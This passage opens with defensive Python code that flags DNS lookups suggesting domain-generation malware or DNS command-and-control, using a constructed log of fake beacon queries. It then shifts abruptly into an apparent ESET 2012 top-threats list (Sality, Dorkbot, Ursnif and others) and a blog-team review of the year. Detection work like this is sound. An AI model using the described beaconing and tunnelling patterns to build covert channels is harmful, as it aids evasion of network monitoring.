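    """(client -> parent domain) pairs that sent many distinct, long subdomain
    labels: data riding in the query names rather than a real hostname."""
    seen = defaultdict(set)
    for r in rows:
        parts = labels(r["qname"])
        if len(parts) >= 3 and len(parts[0]) >= min_label_len:
            seen[(r["client"], ".".join(parts[-2:]))].add(parts[0])
    result: Dict[str, Dict[str, float]] = {}
    for (client, parent), subs in seen.items():
        if len(subs) >= min_distinct:
            result[f"{client} -> {parent}"] = {
                "distinct_subdomains": len(subs),
                "mean_entropy": round(sum(map(shannon_entropy, subs)) / len(subs), 2),
            }
    return result


def _fake_beacon(i: int) -> str:
    # constructed stand-in for an encoded beacon payload carried in a label
    return hashlib.sha256(f"beacon-{i}".encode()).hexdigest()[:40]


# Constructed log: one normal client, one client churning through a
# pre-computed domain list, one client beaconing over TXT queries.
SAMPLE_LOG = "\n".join([
    "2012-12-03T09:00:01 10.0.0.5 query A www.example.com. NOERROR",
    "2012-12-03T09:00:02 10.0.0.5 query A qvvkkl.invalid. NXDOMAIN",
    "2012-12-03T09:00:02 10.0.0.5 query A wzpmjxq.invalid. NXDOMAIN",
    "2012-12-03T09:00:03 10.0.0.5 query A bfqhtzkw.invalid. NXDOMAIN",
    "2012-12-03T09:00:03 10.0.0.5 query A xptrvqnl.invalid. NXDOMAIN",
    "2012-12-03T09:00:04 10.0.0.5 query A mkzqvfjt.invalid. NXDOMAIN",
    "2012-12-03T09:00:09 10.0.0.9 query A mail.example.com. NOERROR",
    "2012-12-03T09:00:09 10.0.0.9 query A typo-host.example.com. NXDOMAIN",
] + [f"2012-12-03T09:01:0{i} 10.0.0.7 query TXT {_fake_beacon(i)}.cmd.invalid. NOERROR"
     for i in range(3)])

if __name__ == "__main__":
    rows = parse_log(SAMPLE_LOG)
    print("possible pre-computed-domain lookups:", dga_suspects(rows))
    print("possible DNS command and control:", dns_c2_suspects(rows))
```

The single typo lookup from 10.0.0.9 is not flagged, which is the point of counting per client and of requiring the label to look random: a handful of NXDOMAIN answers is everyday noise, a run of them for consonant soup is not.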

5. Win32/Sality

Percentage Detected: 1.61%

Sality is a polymorphic file infector. When run, it starts a service and creates or deletes registry keys related to security activities on the system, and ensures that the malicious process starts on each reboot of the operating system.
It modifies EXE and SCR files and disables services and processes related to security solutions.
More information relating to a specific signature:
http://www.eset.eu/encyclopaedia/sality_nar_virus__sality_aa_sality_am_sality_ah

6. Win32/Dorkbot

Percentage Detected: 1.55%

Win32/Dorkbot.A is a worm that spreads via removable media. The worm contains a backdoor and can be controlled remotely. The file is run-time compressed using UPX.
The worm collects login user names and passwords when the user browses certain web sites, then attempts to send the gathered information to a remote machine.

7. JS/TrojanDownloader.Iframe.NKE

Percentage Detected: 1.39%

It is a trojan that redirects the browser to a specific URL hosting malicious software. The malware's program code is usually embedded in HTML pages.

8. Win32/Sirefef

Percentage Detected: 1.31%

Win32/Sirefef.A is a trojan that redirects results of online search engines to web sites that contain adware.

9. Win32/Ramnit

Percentage Detected: 0.98%

It is a file infector: a virus that executes on every system start. It infects DLL and EXE files and also searches HTM and HTML files in order to write malicious instructions into them. It exploits a vulnerability on the system (CVE-2010-2568) that allows it to execute arbitrary code. It can be controlled remotely to capture screenshots, send gathered information, download files from a remote computer and/or the Internet, run executable files, or shut down/restart the computer.

10. Win32/Spy.Ursnif

Percentage Detected: 0.76%

This is a spyware application that steals information from an infected computer and sends it to a remote location. It creates a hidden user account in order to allow communication over Remote Desktop connections.

What does this mean for the End User?

While there may be a number of clues to the presence of Win32/Spy.Ursnif.A on a system if you’re well-acquainted with esoteric Windows registry settings, its presence will probably not be noticed by the average user, who will not be able to see that the new account has been created.

In any case it’s likely that the detail of settings used by the malware will change over its lifetime. Apart from making sure that security software (including a firewall and, of course, anti-virus software) is installed, active and kept up-to-date, users’ best defense is, as ever, to be cautious and proactive in patching, and in avoiding unexpected file downloads/transfers and attachments.

ThreatBlogger FootSloggers Review 2012

David Harley, ESET Senior Research Fellow

2012 on the ThreatBlog was far too busy to do justice to in a fairly short article: inevitably, I’ll have to leave out some articles. Nevertheless the following summary should at least give you an idea of how the year looked to the blogging team.

January began with a flurry of Facebook-related activity, though it covered a wide range of related topics.

Stephen Cobb wrote about the many scams that preyed on the popular dislike and distrust of Facebook’s imminent Timeline feature: Facebook’s timeline to fraud-a-geddon? In Facebook, your birthday #1, and survey scams I looked at Facebook memes like ‘the song that was #1 when I was born’ – in my case it was a snappy little number called Sumer is icumen in, I think.

The Facebook watch site Facecrooks flagged a scam based on a fake app that claimed to tell you how much time you’d wasted – sorry, spent – on Facebook, which reminded one of our readers of the persistent ‘see who visits your profile’ scam. (Such an app isn’t possible.) I wrote about it in Facebook scam: the hours I spend…

In Facebook Fakebook: New Trends in Carberp Activity,  Aleksander Matrosov described some changes in the Carberp Trojan, including its gambit for extorting money from Facebook users by displaying a fake Facebook page when they tried to log into FB. The page claims that “Your Facebook account is temporary locked!” and instructs the victim to pay 20 Euros by Ukash voucher.

Of course, other social media were targeted too, as Stephen pointed out in Tricky Twitter DM hack seeks your credentials, malware infection, and more.

In fact, scams were a very prominent feature of the January threatscape: the first blog of the year, with some input from ESET Ireland’s Urban Schrott, looked at a 419 scam that the scammer took the trouble to translate into Irish Gaelic, though I can’t vouch for the quality of the translation: Irish 419-er seeks Spanish Lady. There was an echo much later in the year when the Irish Times reported the discovery of ‘the first Irish virus’, though it was actually ransomware rather than a real (self-replicative) virus, with the message translated into Irish: Irish Ransomware Report. Somewhat amusingly, Kafeine also drew my attention to a scam message targeting Ireland but translated into Iranian rather than Irish. Some miscommunication there… Ransomware Part III: another drop of the Irish. And Aryeh Goretsky warned us to Beware of SOPA Scams and ZeuS-related malware, rather bizarrely, passed itself off as a phishing message alert from US-CERT and the Anti-Phishing Working Group (Phishing and Taxes: a dead CERT?). Sebastian Bortnik flagged the way that Malware exploits death of North Korea’s Kim Jong-il.

Passwords and passwording have been a pretty constant topic of interest this year, too. In Passwords, passphrases, and big numbers: first the good news… I flagged an interesting paper by Cormac Herley and Paul van Oorschot and linked to a number of resources from ESET and elsewhere that might be of use and interest (so I’m including them here).

And as Cameron Camp described in Zappos.com breach – lessons learned, Zappos.com experienced one of the first major customer authentication breaches of the year but reacted promptly and efficiently. Cameron also had some good advice for those of us who were enjoying new toys of the tablet persuasion: New Year’s resolutions for securing your new tablet. Peter Stancik asked us if it was Time to check your DNS settings? and offered advice on how to tell if your system had been infected by DNSChanger malware in advance of the constantly shifting deadline for the shutting down of the servers that were keeping the owners of infected machines online after the botnet was taken down.

We translated and published an English version of ESET Latin America’s predictions for 2012 – New White Paper “Trends for 2012: Malware Goes Mobile” – and Aryeh updated his paper on Possibly Unwanted Applications: Potentially Unwanted Applications White Paper Updated.

In February, I came back to Facebook memes that might not be as harmless as they seem in an article for Virus Bulletin: Living the Meme, while in How to improve Facebook account protection with Login Approvals Stephen complimented Facebook on a security measure while clarifying its use. Cameron looked in CarrierIQ-style data gathering law to require mandatory notification/opt-in? at a bill requiring mandatory consumer consent prior to allowing the collection or transfer of data on smartphones: he also looked at Google’s attempts to beat back the rising tide of Android malware in Google responds to Android app Market security with stronger scanning measures, and at social media’s commoditization of its customer in Facebook/app data privacy – sharing gone wild, and finished the month with a searching examination of the BYOD trend.

Inevitably, the run-up to Valentine’s Day saw lots of malicious activity, and Stephen addressed the problem comprehensively in Cookie-stuffing click-jackers rip off Victoria’s Secret Valentine’s giftcard seekers. I got the opportunity to talk to senior police officers in the UK about those PC support scams that I’ve been banging on about since before Columbus sailed the blue: Cybercrime and Punishment, and also Cybercrime, Cyberpolicing, and the Public. I also looked at some data from a survey conducted by Amárach Research on behalf of ESET Ireland, as blogged by Urban Schrott: Your Children and Online Safety. ESET North America CEO Andrew Lee returned to the topic of intellectual property, piracy and legislation: ACTA and TPP: The wrong approach to intellectual property protection. Aryeh Goretsky took a long hard look at Windows Phone 8: Security Heaven or Hell?

On the technical analysis front, Aleksandr Matrosov and Eugene Rodionov shared some more research with us on Olmarik/TDL4: TDL4 reloaded: Purple Haze all in my brain. And Righard Zwienenberg, fresh to ESET but with many, many years in the security industry already, looked at Password management for non-obvious accounts.

Cameron kicked us off in March with a series of reports from the huge RSA conference in San Francisco, and Stephen followed up in Information Security Disconnect: RSA, USB, AV, and reality. Several security gurus at RSA who should really have known better told Wired that they don’t use antivirus and strongly implied that no-one else should either: I responded to that in Security professionals DO use anti-virus. Stephen made available the excellent Malware Inc. presentation that he made at RSA – Changing how people see the malware threat: images can make a difference – and offered an infographic exploring all the data Google could, potentially exploit: Google’s data mining bonanza and your privacy: an infographic. He also considered the issues around employers requiring access to employee Facebook accounts and the spring crop of IRS-related scams: Facebook logins toxic for employers, violate security and privacy principles and Spring Brings Tax-related Scams, Spams, Phish, Malware, and the IRS.

On the more technical front, Righard shared a few surprises with us after he installed Skype onto a new laptop: SKYPE: (S)ecurely (K)eep (Y)our (P)ersonal (E)-communications, followed up with some analysis of Android’s locking mechanism that gave me a useful reference for my EICAR presentation in May on PIN Holes: Passcode Selection Strategies, and then looked at Win32/Georbot in From Georgia With Love: Win32/Georbot information stealing trojan and botnet. ESET Canada allowed me access to some of their research so that I was able to sound as if I might know what I was talking about in Kelihos: not Alien Resurrection, more Attack of the Clones. In Modern viral propagation: Facebook, shocking videos, browser plugins, Robert Lipovsky looked in some depth at scam propagation techniques, and in Vulnerable WordPress Leads to Security Blog Infection he looked at Javascript infectors. I looked in depth at some more of the techniques used by support scammers – Support Scammers (mis)using INF and PREFETCH and Fake Support, And Now Fake Product Support, and our Russian colleagues shared lots of information on Blackhole, CVE-2012-0507 and Carberp. And Alexis Dorais-Joncas delved into the murky world of Mac malware: OSX/Imuler updated: still a threat on Mac OS X, and OSX/Lamadai.A: The Mac Payload.

In April the questions of quasi-testing and the usefulness (or not) of anti-virus came up again. I finally posted a paper on the topic with Julio Canto of VirusTotal and engaged in a debate of sorts in SC Magazine: VirusTotal, Useful Engines, and Useful AV, and, along with Andrew Lee, tried to introduce a note of sanity into the ‘AV isn’t worth paying for’ debate: Free Anti-virus: Worth Every Penny? So that’s sorted that question? Unfortunately not: in December (see below) the same fallacies came up all over again.

Aleksandr looked at a hot-off-the-press exploit kit technique: Exploit Kit plays with smart redirection (amended). In Phishing Using HTML and Intranet Security Settings Righard dug deep into a rather novel approach to phishing, and gave some good advice following the deferment of the FBI’s shutdown of servers maintained following the takedown of DNSchanger botnets: DNS Changer (re)lived, new deadline: 9 July 2012!

Stephen introduced another very popular infographic, this time on Bring Your Own Device: BYOD Infographic: For security it’s not a pretty picture, a topic most of us have been asked about or written about many times this year, in blogs, conferences and interviews. He also looked at the legal imperatives that make establishing a WISP (Written Information Security Program) a good idea, at Java, Macs and Flashbacks, and took a long hard look at QR Codes and NFC Chips: Preview-and-authorize should be default.

Alexis Dorais-Joncas and Pierre-Marc Bureau both wrote about OSX/Malware (yes, Virginia, there is such a thing), Cameron wrote about Pinterest, and asked Could your next new car be hacked (should you be scared)? And I wrote about PC support scams. Quelle surprise. But maybe it’s never a waste of time to show people How to recognize a PC support scam.

On May 1st I thought about going Morris dancing but instead I wrote about a support scam poll on behalf of the Internet Storm Center. For someone who stopped working the helpdesk in 2001, there seem to be an awful lot of support issues in my life. Since I spent most of the month at EICAR, CARO (Aleksandr blogged about his presentation there) and AMTSO, AMTSO in particular rather dominated my writing and even got me an unexpected interview with Infosecurity Magazine. I did have one moment of old-time AV nostalgia, though: Win32/Flamer: the 21st Century Whale.

Stephen had good advice for travellers (thanks, Stephen: came in very useful!) in 11 Tips for protecting your data when you travel and Foreign Travel Malware Threat Alert: Watch out for hotel Internet connections. For stay-at-home, virtual travellers he had more advice in How to stop Twitter tracking you and keep private the websites you visit and made available a video giving the bad guy’s view of a remote access Trojan: Malware RATs can steal your data and your money, your privacy too.

Aryeh posted about a new approach to cruise/vacation property scams: Press One if by LAN, Two if by Sea… And Cameron posted on SMSmishing (SMS Text Phishing) – how to spot and avoid scams, Millions have not reviewed Facebook privacy settings: Here’s how, and DNSChanger ‘temporary’ DNS servers go dark soon: is your computer really fixed?

In June, Stuxnet and its siblings (or offspring) became a big issue (again): not only because of the fuss about Flamer, but because it suddenly seemed that the US government was claiming part of the credit for Stuxnet, at least. Stephen spoke for us all when he said Stuxnet, Flamer, Flame, Whatever Name: There’s just no good malware, and made more good points on The negative impact on GDP of state-sponsored malware like Stuxnet and Flame. He provided more travel advice in Data security and digital privacy on the road, what travelers should know, but while the holiday season was just getting into its swing in the Northern hemisphere, he warned that Back to school scams? They may be just around the corner, and advised on how to spot them.

Aryeh, meanwhile, was beset by scams in SMSmishing Unabated: Best Buy targeted by fake gift card campaign and Close Call with a Caribbean Cruise Line Scam. He seems to have become inextricably entangled with cruise scams in the same way that I have with support scams. We both had something to say on the perennial topic of passwords and PINs: Guarding against password reset attacks with pen and paper and Passwords and PINs: the worst choices. But I did manage to get a little time out in Slovenia (and got very sunburnt in Venice), though I was basically there for a conference at the behest of Urban Schrott, of ESET Ireland.

Cameron was mainly focused on social networking, from Google to LinkedIn to Facebook (Your Facebook account will be terminated – again and Facebook policy changes – does the ‘crowd’ really have a seat at the table?). He still found time to indulge his passion for automotive security, though: How much will your driverless car know about you (and who will it tell)?

On the technical analysis side, Jean-Ian Boutin looked at Win32/Gataka and Robert Lipovsky and Righard Zwienenberg both looked at ACAD/Medre. Meanwhile, Aleksandr Matrosov and I both talked about the ZeroAccess rootkit, while Aleks noted some interesting data around CVE-2012-1889: MSXML use-after-free vulnerability.

In July, Aryeh blogged about .ASIA Domain Name Scams Still Going Strong instead of cruise line scams and I blogged a couple of times about support scam gambits. Ho, hum. Peter Stancik and I addressed in several blogs the issue of the final deadline for the turning off of the FBI’s servers substituting for the DNSChanger servers. If there’s anyone still out there who doesn’t have Internet access any more, I don’t think you can blame us.

Righard found some Scareware on the Piggy-Back of ACAD/Medre.A. Aleks blogged about Flame and its siblings and predecessors, updates to the Rovnix framework, Java exploitation, and legal assaults on the Carberp botnet (yay!).

There were more issues with passwords that Stephen and I couldn’t resist blogging about: Passwords of Plenty*: what 442773 leaked Yahoo! accounts can tell us and Password Party Weekend? Millions exposed now include Phandroid, Nvidia, me. Stephen also commented on an Instagram vulnerability. Cameron blogged his socks off about BlackHat, Defcon, Free YouTube .mp3 converters – with a free malware bonus, and Gamigo game site hack – lessons learned (and what should you do), and UK journalist Kevin Townsend turned my thoughts to Rakshasha, Hindu demon and allegedly permanent and undetectable backdoor. I think not.

August was a little quieter, and Aleks led off with Flamer Analysis: Framework Reconstruction, while Eugene Rodionov, whose work with Aleks has informed so much of the analysis we’ve blogged on here, highlighted the Interconnection of Gauss with Stuxnet, Duqu & Flame. Stephen dissected the way the Reveton ransomware snares its victims. Sébastien Duquette blogged a comprehensive analysis of a website selling access to a malware-distribution service. The guys responsible seem to have loved the publicity, but our filtering stopped them piggybacking the blog to get more custom. Come on guys, we’re not that dumb…

Robert Lipovsky blogged about Quervar – Induc.C reincarnate? and there was an unexpected intersection between technical analysis and support scams: Support scams and Quervar/Dorifel. In fact, there was a lot of action around support scams this month: AMMYY, whose remote access service is often misused by Indian scammers (in the US, it’s often referred to as the AMMYY scam), came up with some useful information and a warning, while one of the scammers who ring me with monotonous regularity provided a little light relief: Support Scammer Anna’s CLSID confusion. All good material for the presentations on the topic I’d be making at CFET and Virus Bulletin in September.

Cameron picked up on Mac OSX/iOS hacks at Blackhat – are scammers setting their sights?, Blizzard Entertainment hacking, and photo tagging on Facebook. Stephen offered excellent advice: Java zero day = time to disable Java, in your browser at least. Cameron also blogged at some length about the FinFisher spyware and I took up the theme when one of our readers asked about ESET’s detection of the spyware (which we detect as Win32/Belasek.D): Finfisher and the Ethics of Detection.

While I’ve previously talked about the Top Umpteen bad choices of password, I got fed up with all the journalists simply listing over-used passwords as if all you have to do is not use the top 25 and you’re safe, and tried to adopt a more constructive approach: Bad password choices: don’t miss the point. However, one of my blogs that month came directly from a conversation with one of the more technically competent journalists working in security, The Register’s John Leyden: Carbon Dating and Malware Detection.

September was also fairly quiet in the run-up to the Virus Bulletin conference: like most of the anti-malware industry, we consider VB to be one of the most important events of the year, and as you’ll see from my summary of ESET’s papers and articles in 2012, we had a lot of presentations to prepare for. Righard and I also presented at a small but invariably interesting forensics conference at Canterbury, in the UK. While I was there, I grabbed an opportunistic photo on my phone that I was able to use almost immediately for a blog on ATM/cashpoint security: again, it derived from an article by a knowledgeable journalist specializing in computer security, the estimable Brian Krebs: ATM Security? Don’t bank on it.

Sadly, Pierre-Marc Bureau doesn’t often find time to contribute to the blog these days, but when he does, it’s always worth reading, and Dancing Penguins – A Case of Organized Android Pay Per Install was no exception. Aryeh also looked at Android security in The Dynamic Duo for Securing your Android: Common Sense and Security Software. And Pierre-Marc also summarized the state of (non-)play with OSX/Flashback in Flashback Wrap Up.

We came across the ‘first Irish virus’ which appears to have been non-viral ransomware with the message translated into (Irish) Gaelic (Gaeilge). Actually, thanks to researcher ‘Kafeine’ I subsequently got to see examples of other messages regionalized for other countries and languages. While this kind of malicious activity is no laughing matter, I did get some amusement out of the fact that one example inadvertently used some French text among the Gaeilge, and another apparently got confused between the .ir and .ie Top Level Domains and generated text in Iranian language apparently intended to target speakers of Gaeilge.

I also returned to the topic of PIN selection strategies, commenting on research from DataGenetics: Choosing a non-obvious PIN. Cameron wrote about Facebook timeline security & privacy: steps to keep your account & identity safe, and followed up with Facebook timeline privacy/security: protect your account and identity (2/2). And in a slightly unusual case of the source quoting the journalist(s) I cited conversations with and articles by Kevin Townsend, Dan Raywood, and John Leyden in a post on malware inserted into the supply chain: Nitol Botnet: You Will Never Break The Chain.

In October, Cameron blogged about a free Android app from ESET available from Google Play to protect Android devices from the USSD vulnerability: Free Android USSD vulnerability protection from ESET now on Google Play. Aryeh also shared some product information: W8ing for V6: What ESET has in store for Windows 8 Users. Stephen asked, given that October was National Cyber Security Awareness Month, whether How’s Your Cyber Security Awareness? Or, do we really need security training? (the answer was yes!) By way of follow-up he disclosed the results of a Harris Poll that found that Younger people less secure online than their elders new study suggests, and in Brutalized! South Carolina breach exposes data security woes at State level, observed that 86% of state CISOs identified “lack of sufficient funding” as the key barrier to addressing cybersecurity. He also picked up on concerns about threats inserted into the supply chain, this time with reference to government paranoia: Huawei? The how, what, and why of telecom supply chain threats.

Aleks contributed some typically detailed technical analysis in Olmasco bootkit: next circle of TDL4 evolution (or not?). Stephen gave me a break from writing about support scams and blogged about how FTC cracks down on tech support scams and feds nail fake AV perps, though I couldn’t resist blogging a week or two later on why the problem isn’t going to disappear completely just yet: Telescammer Hell: What’s Still Driving The PC Support Scammers? But of course several of us, as ever, were reporting on scams of one sort or another. Cameron warned us to Avoid Election Season Scams: Donations and cruises to avoid. I talked about telephone scams that weren’t PC support scams – Telephone Scams: it’s not all about PC support – and I finished off the month with an ambitious three-part blog on phishing (with some help from Urban Schrott) which is now available as a single paper. I should probably emphasize that when I wrote about Malware and Medical Devices: hospitals really are unhealthy places… I had no prior knowledge of where the plot of Homeland series two was going (murder by remotely controlled pacemaker). :)

November inevitably continued some similar themes. On the technical front, Jean-Ian Boutin looked at the latest developments concerning Win32/Gataka – or should we say Zutick? Pablo Ramos wrote two blogs on Android/TrojanSMS.Boxer.AA, one of them a deep-dive technical analysis and the other aimed at a more general audience: Don’t pay high phone bills: SMS Trojans can trick you via premium-rate numbers. This is an approach we’d like to make more use of, giving our less technical audience a view of why certain malicious technology has an impact on their online lives without boring them with programmatic esoterica, but doing so is something of a challenge for a small blogging team. Writing technical content that is relevant and interesting to the lay reader but still accurate is as demanding in its own way as heavily technical material. In Win32/Morto – Made in China, now with PE file infection, Pierre-Marc managed to find a balance between the two that appealed to a wide range of readers.

In Wauchos Warhorse rides again I looked at an interesting spike spotted by Stephen in UK detections of an elderly malware family. Statistical artifacts are interesting, but not always explicable. Aryeh is the team expert on Windows 8, but in Windows 8: there’s more to security than the Operating System I looked at the way current events (such as the release of Win8 and Hurricane Sandy) become fodder for social engineering attacks, and in Premium Rate Scams and Hoaxes I looked at a very different aspect of Premium Rate misuse to that blogged by Pablo. In Support Scams and the Surveillance Society and New Support Scam Gambits: Frozen Virus a Frozen Turkey I looked at some new evolutions in PC support scamming. Stephen followed up his speculations on a new angle on data theft (Digital photos demand a second look as picture-stealing threat develops) with a very useful, very popular seasonal piece on Safer cyber-shopping makes for happier holidays: 12 simple safety tips.

At the time of writing, December is barely half-way through and already shaping up to be as eventful as any other month this year. There was another Mac-specific attack on Tibetan activists – Spying on Tibetan sympathisers and activists: Double Dockster – while Stephen returned to the vexatious topic of passwording in Password handling: challenges, costs, and current behavior (now with infographic). It’s frustrating that such a flawed and heavily exploited authentication technology still dominates our online lives.

Another security company tried to prove that money spent on anti-virus would be better spent on their own products with a poorly-conceived ‘test’ based on inappropriate use of the VirusTotal service. Righard pointed to some of the flaws in their logic in Why Anti-Virus is not a waste of money and I returned to the theme of misuse of VirusTotal (which I’d already addressed in a joint paper with VT’s Julio Canto) in one of my external (non-ESET) blogs. (Some of us do a great deal of blogging and other writing outside ESET, far more than the list of papers and articles below indicates: it would be just too time-and-space-consuming to find and list everything we’ve written this year.)

The security industry suddenly woke up to the fact that despite Microsoft’s attempts to eradicate the misuse of the Autorun functionality in removable media, threats that use that vector continue to thrive. This wasn’t exactly news to us: INF/Autorun and its siblings have been dominating our threat reports all along. However, Stephen generated some interesting and useful new material on the topic in My Little Pronny: Autorun worms continue to turn and Are your USB flash drives an infectious malware delivery system?

I was overcome by nostalgia after receiving a 419 claiming to be from the wife of a former Nigerian Head of State: Maryam Abacha rides again: yes, Virginia, there IS a Sani-ty Clause!*. Ontinet’s Josep Albors directed my attention to the murky world of boiler room scams and alternative investment scams in Diamonds are forever, and so are investment scams. ESET Latin America offered their predictions for malware trends in 2013 in a paper announced by Sebastian Bortnik: Trends for 2013: astounding growth of mobile malware. Unsurprisingly, Android malware is prominently featured. Other ESET researchers looked into their own crystal balls a little later in the month.

Aleks updated ongoing research on the vulnerabilities in smartcard systems used for banking with news of Win32/Spy.Rambus. Pablo returned to the topic of Dorkbot, the subject of his paper at the Virus Bulletin conference. And Aryeh kicked off a highly seasonal series on securing those Christmas computing goodies. A lot of interest was generated by Pierre-Marc’s report of malicious activity in the Linux realm, which prompted talk of a “malicious Apache module” which then prompted a further post to clarify the implications of that phrase.
